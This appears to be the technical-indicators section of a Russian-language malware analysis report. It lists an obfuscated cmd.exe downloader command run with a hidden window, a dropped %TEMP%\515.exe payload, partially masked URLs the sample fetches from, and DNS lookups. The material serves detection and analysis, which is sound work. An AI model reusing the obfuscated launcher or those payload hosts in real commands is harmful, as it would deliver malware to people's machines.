Техническая информация
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set OTq3=cqLNEZiDOiHpBcPhRuAZStAXZlijNqRtBbDslm;F(kW=yCwo$Q)r657GIvnd.,M 8f':z+\g@x\eT}1aU-{0&&for %6 in (48,80,62,46,43,66,29,8,31,66,38,48,36,29,6...
- %TEMP%\515.exe
- %TEMP%\515.exe
- %TEMP%\515.exe
- 'it####namirim.org':80
- 'we#####designgarden.com':80
- 'ho##n.net':80
- 'id###periet.com':80
- http://it####namirim.org/fj
- http://we#####designgarden.com/k7Xp
- http://ho##n.net/h6T6
- http://www.ho##n.net/h6T6
- http://www.id###periet.com/0hP
- DNS ASK is##.com.mx
- DNS ASK it####namirim.org
- DNS ASK we#####designgarden.com
- DNS ASK ho##n.net
- DNS ASK id###periet.com
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set OTq3=cqLNEZiDOiHpBcPhRuAZStAXZlijNqRtBbDslm;F(kW=yCwo$Q)r657GIvnd.,M 8f':z+\g@x\eT}1aU-{0&&for %6 in (48,80,62,46,43,66,29,8,31,66,38,48,36,29,6...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /V/C"set OTq3=cqLNEZiDOiHpBcPhRuAZStAXZlijNqRtBbDslm;F(kW=yCwo$Q)r657GIvnd.,M 8f':z+/g@x\eT}1aU-{0&&for %6 in (48,80,62,46,43,66,29,8,31,66,38,48,36,29,68,43,58,75,46,81,47,33,27,75,13,31,63,28...